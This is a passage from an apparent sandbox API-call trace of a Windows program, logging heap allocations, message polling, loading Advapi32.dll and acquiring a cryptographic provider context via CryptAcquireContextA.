Flags=0x0, Size=0x4) returned 0x2e54d08 [0128.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0128.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0128.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0128.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0128.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0128.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0128.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0128.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0128.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0128.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0128.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0128.925] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0128.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0128.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0128.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0128.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0128.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0128.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0128.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0128.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.926] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0128.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.926] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0128.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0128.926] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0128.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0128.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0128.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c78 [0128.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0128.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0128.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0128.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0128.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0128.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0128.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0128.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0128.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0128.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0128.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0128.927] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0128.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.927] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0128.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0128.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0128.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0128.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0128.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0128.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0128.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0128.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0128.927] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0128.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0128.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0128.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0128.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0128.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0128.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0128.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0128.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0128.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0128.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0128.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0128.928] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0128.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0128.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0128.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0128.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0128.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0128.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0128.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0128.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0128.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.929] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.929] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0128.929] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.929] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0128.929] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0128.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.930] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.930] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0128.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0128.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0128.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0128.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0128.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0128.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0128.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0128.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0128.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0128.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0128.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.931] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0128.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0128.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0128.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0128.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0128.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0128.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0128.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0128.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0128.932] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0128.932] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0128.932] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0128.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0128.933] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0128.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0128.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0128.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0128.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0128.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0128.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69988 [0128.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69988, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0128.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0128.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0128.934] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0128.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0128.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0128.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0128.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0128.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0128.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0128.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0128.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0128.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0128.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0128.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0128.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0128.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0128.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0128.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0128.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0128.935] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0128.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0128.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0128.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0128.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0128.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0128.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0128.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0128.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0128.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0128.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0128.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0128.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0128.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0128.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0128.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0128.936] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0128.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0128.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0128.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0128.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0128.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0128.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0128.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0128.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0128.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0128.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0128.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0128.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0128.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0128.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0128.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0128.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0128.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0128.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0128.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0128.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0128.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0128.938] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0128.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0128.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0128.938] RtlAllocateHeap 